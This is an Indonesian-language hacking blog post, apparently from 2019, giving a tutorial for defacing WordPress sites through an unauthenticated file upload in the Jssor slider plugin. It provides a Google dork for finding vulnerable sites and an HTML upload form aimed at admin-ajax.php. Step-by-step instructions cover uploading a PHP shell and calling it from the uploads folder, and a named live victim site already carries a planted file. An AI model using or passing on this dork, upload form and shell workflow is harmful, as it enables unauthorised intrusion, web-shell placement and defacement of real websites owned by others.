Beranda  ›  Deface

Deface Wordpress Json Slider

Ditulis sampahberkualitas Minggu, 14 Juli 2019 Tulis Komentar Edit

Assalamualaikum wr wb
Deface Wordpress Json Slider Vulnribility Upload With Csrf
Ekstensi Yg Bisa Di Upload:Php,Html
=====================================
Google Dork: inurl:''/wp-content/jssor-slider/jssor-uploads/''

Exploit:http://site.com/wp-content/jssor-slider/jssor-uploads/
=====================================
Csrf(Cross Site Requests Forgency):     
<html>
<body>
<form action="http://targetmu.com/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
=====================================
Langkah Langkah:
1.Dorking Di Google
2.Pilih Website Dan Masukan Exploit
Jika Forbiden Atau tampilan Blank Biasanya Vuln
3.Lalu Buka Csrf Dan Up Shell
Jika Berhasil Upload maka Seperti ini tampilanya

4.Cara manggil Shellmu
  path http://sites.com/wp-content/jssor-slider/jssor-uploads/shell.php


Live Target http://maxduhanov.ru/wp-content/jssor-slider/jssor-uploads/ha.html




Belum ada Komentar untuk "Deface Wordpress Json Slider"

Posting Komentar

Langganan: Posting Komentar (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel